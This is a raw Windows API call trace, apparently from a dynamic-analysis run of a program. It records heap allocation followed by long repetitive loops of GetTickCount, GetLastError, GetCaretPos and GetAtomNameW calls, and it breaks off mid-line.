[0042.930] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x80) returned 0x6d1c28 [0042.930] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40636c) returned 0x0 [0042.931] RtlSizeHeap (HeapHandle=0x6d0000, Flags=0x0, MemoryPointer=0x6d1c28) returned 0x80 [0042.931] GetTickCount () returned 0x114626b [0042.931] GetLastError () returned 0x0 [0042.931] GetTickCount () returned 0x114626b [0042.931] GetLastError () returned 0x0 [0042.931] GetTickCount () returned 0x114626b [0042.931] GetLastError () returned 0x0 [0042.931] GetTickCount () returned 0x114626b [0042.931] GetLastError () returned 0x0 [0042.931] GetTickCount () returned 0x114626b [0042.931] GetLastError () returned 0x0 [0042.931] GetTickCount () returned 0x114626b [0042.931] GetLastError () returned 0x0 [0042.931] GetTickCount () returned 0x114626b [0042.931] GetLastError () returned 0x0 [0042.931] GetTickCount () returned 0x114626b [0042.931] GetLastError () returned 0x0 [0042.931] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.932] GetTickCount () returned 0x114626b [0042.932] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.933] GetLastError () returned 0x0 [0042.933] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.934] GetLastError () returned 0x0 [0042.934] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.935] GetLastError () returned 0x0 [0042.935] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.936] GetTickCount () returned 0x114626b [0042.936] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.937] GetTickCount () returned 0x114626b [0042.937] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.938] GetTickCount () returned 0x114626b [0042.938] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.939] GetLastError () returned 0x0 [0042.939] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.940] GetTickCount () returned 0x114626b [0042.940] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.941] GetLastError () returned 0x0 [0042.941] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.942] GetTickCount () returned 0x114626b [0042.942] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.943] GetLastError () returned 0x0 [0042.943] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.944] GetTickCount () returned 0x114626b [0042.944] GetLastError () returned 0x0 [0042.945] GetTickCount () returned 0x114626b [0042.945] GetLastError () returned 0x0 [0042.945] GetTickCount () returned 0x114626b [0042.945] GetLastError () returned 0x0 [0042.945] GetTickCount () returned 0x114627b [0042.945] GetLastError () returned 0x0 [0042.945] GetTickCount () returned 0x114627b [0042.945] GetLastError () returned 0x0 [0042.945] GetTickCount () returned 0x114627b [0042.945] GetLastError () returned 0x0 [0042.945] GetTickCount () returned 0x114627b [0042.945] GetLastError () returned 0x0 [0042.945] GetTickCount () returned 0x114627b [0042.945] GetLastError () returned 0x0 [0042.945] GetTickCount () returned 0x114627b [0042.945] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.946] GetTickCount () returned 0x114627b [0042.946] GetLastError () returned 0x0 [0042.947] GetTickCount () returned 0x114627b [0042.947] GetLastError () returned 0x0 [0042.947] GetTickCount () returned 0x114627b [0042.947] GetLastError () returned 0x0 [0042.947] GetTickCount () returned 0x114627b [0042.947] GetLastError () returned 0x0 [0043.088] lstrlenA (lpString="") returned 0 [0043.088] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.088] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.088] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.088] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.088] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.088] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.088] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.088] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.088] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.088] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.089] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.089] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.090] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.090] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] 